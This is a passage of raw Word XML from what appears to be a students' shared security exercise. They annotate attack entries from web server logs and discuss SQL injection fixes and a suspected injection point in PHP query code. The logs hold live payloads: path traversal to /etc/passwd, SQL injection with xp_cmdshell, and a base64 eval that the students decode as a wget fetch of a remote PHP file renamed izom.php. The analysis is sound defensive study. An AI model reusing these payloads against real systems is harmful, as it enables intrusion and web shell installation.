          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>/passwd%00 HTTP/1.1" 200 1062 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BAEA6" w:rsidP="75FE2C14" w:rsidRDefault="152BAEA6" w14:paraId="4B43EA64" w14:textId="3B2858C5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This log seems to be doing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sketchy too but not sure what</w:t>
      </w:r>
      <w:r w:rsidR="3CB5CB79">
        <w:t xml:space="preserve"> (seems to be an XSS coupled with SQL injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BAEA6" w:rsidP="75FE2C14" w:rsidRDefault="152BAEA6" w14:paraId="1684C48B" w14:textId="5B48D617">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve">176.10.104.240 - - [13/Oct/2018:05:29:53 +0100] "GET /~ANON/phpsemantics/files/kphp.pdf?PGXZ=4380%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 632500 "-" "Mozilla/4.0 (compatible; MSIE 5.13; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Mac_PowerPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>)"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FE2C14" w:rsidP="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="0F607258" w14:textId="4A5523EF"/>
    <w:p w:rsidR="747E213E" w:rsidP="75FE2C14" w:rsidRDefault="747E213E" w14:paraId="6E51874D" w14:textId="1472B769">
      <w:r>
        <w:t>5.44.173.71 - - [06/Nov/2018:04:18:52 +0000] "GET /~ANON/teachlocal/cuscomp/papers/soc-OverviewProcessors.pdfforumrunner/request.php?d=1&amp;cmd=get_spam_data&amp;postids=-1)union%20select%201,2,3,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r>
        <w:t>)%20from%20(</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:t>)where%20(table_schema=database()%20and%20(table_name%20REGEXP%200x7573657224)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3D626173653D,table_name,0x3D626173653D))))x),5,6,7,8,9,10--%20- HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A935770" w:rsidP="5A935770" w:rsidRDefault="5A935770" w14:paraId="3B230713" w14:textId="767E3F91"/>
    <w:p w:rsidR="17882477" w:rsidP="5A935770" w:rsidRDefault="1CEE1974" w14:paraId="02978181" w14:textId="13DD127D">
      <w:r>
        <w:t xml:space="preserve">104.196.16.49 - - [24/Nov/2018:23:29:23 +0000] "GET /~ANON/papers/w//wordpress//produits/?items_per_page=%24%7b%40eval(base64_decode(cGFzc3RocnUoJ2NkIHdwLWNvbnRlbnQvdXBsb2Fkcy8yMDE4LzAxO3dnZXQgaHR0cDovL3d3dy5hd3RjLmFpZHQuZWR1Ly9jb21wb25lbnRzL2NvbV9iMmpjb250YWN0L3VwbG9hZHMvdHh0LnR4dDttdiB0eHQudHh0IGl6b20ucGhwJyk7))%7d&amp;setListingType=grid HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"</w:t>
      </w:r>
      <w:r w:rsidR="620E743F">
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Decode the hashed content gives “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">('cd wp-content/uploads/2018/01;wget http://www.awtc.aidt.edu//components/com_b2jcontact/uploads/txt.txt;mv txt.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>izom.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">');”, which is then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>evaled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to download a suspicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script from an external source (possibly malicious).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FE2C14" w:rsidP="133B6B4D" w:rsidRDefault="1B3FF235" w14:paraId="59B9D779" w14:textId="229B6A91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bi)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3FF235" w:rsidP="133B6B4D" w:rsidRDefault="1B3FF235" w14:paraId="08622B0C" w14:textId="500E11C6">
      <w:r>
        <w:t xml:space="preserve">Sanitize </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>inputs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="1B3FF235" w:rsidP="133B6B4D" w:rsidRDefault="1B3FF235" w14:paraId="293F213D" w14:textId="1C16B5F0">
      <w:r>
        <w:t>Use non-freeform entry (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dropdown list, radio buttons)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3FF235" w:rsidP="133B6B4D" w:rsidRDefault="513D5377" w14:paraId="02038CC6" w14:textId="29069ADF">
      <w:r>
        <w:t>Remove input altogether</w:t>
      </w:r>
      <w:r w:rsidR="1322363B">
        <w:t xml:space="preserve"> (Stored Procedure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1322363B" w:rsidP="61D57FC2" w:rsidRDefault="46B70557" w14:paraId="5620C307" w14:textId="0A26265D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Parametized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="133B6B4D" w:rsidP="133B6B4D" w:rsidRDefault="78481107" w14:paraId="1AC96DF4" w14:textId="6D1B47FF">
      <w:r>
        <w:t>Prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3FF235" w:rsidP="133B6B4D" w:rsidRDefault="1B3FF235" w14:paraId="4FE8B6C5" w14:textId="14055DFB">
      <w:r>
        <w:t>1st better for users (keeps everything the same, whilst secure). 2nd more guaranteed to make it secure. 3rd guarantees security even more well - loses feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="133B6B4D" w:rsidP="133B6B4D" w:rsidRDefault="133B6B4D" w14:paraId="3A786F32" w14:textId="70F555E4"/>
    <w:p w:rsidR="735EF453" w:rsidP="75FE2C14" w:rsidRDefault="735EF453" w14:paraId="0DA22910" w14:textId="01CCA9C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bii) </w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">Can’t find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>vunlernability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this one. Anybody wants to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>help out</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B9CEC20" w:rsidP="75FE2C14" w:rsidRDefault="1B9CEC20" w14:paraId="45F3037F" w14:textId="7A81C734">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anon1: </w:t>
      </w:r>
      <w:r w:rsidR="0847B937">
        <w:t xml:space="preserve">I gave </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0847B937">
        <w:t>up :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0847B937">
        <w:t xml:space="preserve">’(. The only thing I can think of is </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">   $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>quoteInto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$text, $value); in condition helper</w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="73E32675">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="0847B937">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="386A6FE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>may b</w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:commentRangeStart w:id="5"/>
      <w:commentRangeStart w:id="6"/>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="386A6FE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e escaped with the right quotes</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
      <w:commentRangeEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="5"/>
      </w:r>
      <w:commentRangeEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A3618FF" w:rsidP="75FE2C14" w:rsidRDefault="3A3618FF" w14:paraId="0D212ED3" w14:textId="79A16A1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="7"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Anon2: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Yeah</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> I am not sure either. I was just thinking that it could be possible to write several conditions in X which means it could be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ORed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we can do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>smth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="681FEB17">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> like OR 1=1. </w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="307E80A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The query will then be passed to whatever next block and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="307E80A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>excuted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="307E80A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> there. See code below.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681FEB17" w:rsidP="75FE2C14" w:rsidRDefault="681FEB17" w14:paraId="3B64A847" w14:textId="7E910919">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>foreach ($condition as $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>orCondition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681FEB17" w:rsidP="75FE2C14" w:rsidRDefault="681FEB17" w14:paraId="18327C29" w14:textId="31E2460B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>queries[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>('(%s)', $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>prepareConditio</w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>($field, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>orCondition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>));}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681FEB17" w:rsidP="75FE2C14" w:rsidRDefault="681FEB17" w14:paraId="5B750125" w14:textId="14391CCB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">$query = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">('(%s)', </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>implode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' OR ', $queries))</w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3DC53D" w:rsidP="75FE2C14" w:rsidRDefault="1A3DC53D" w14:paraId="02A9D275" w14:textId="2FC0B3D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
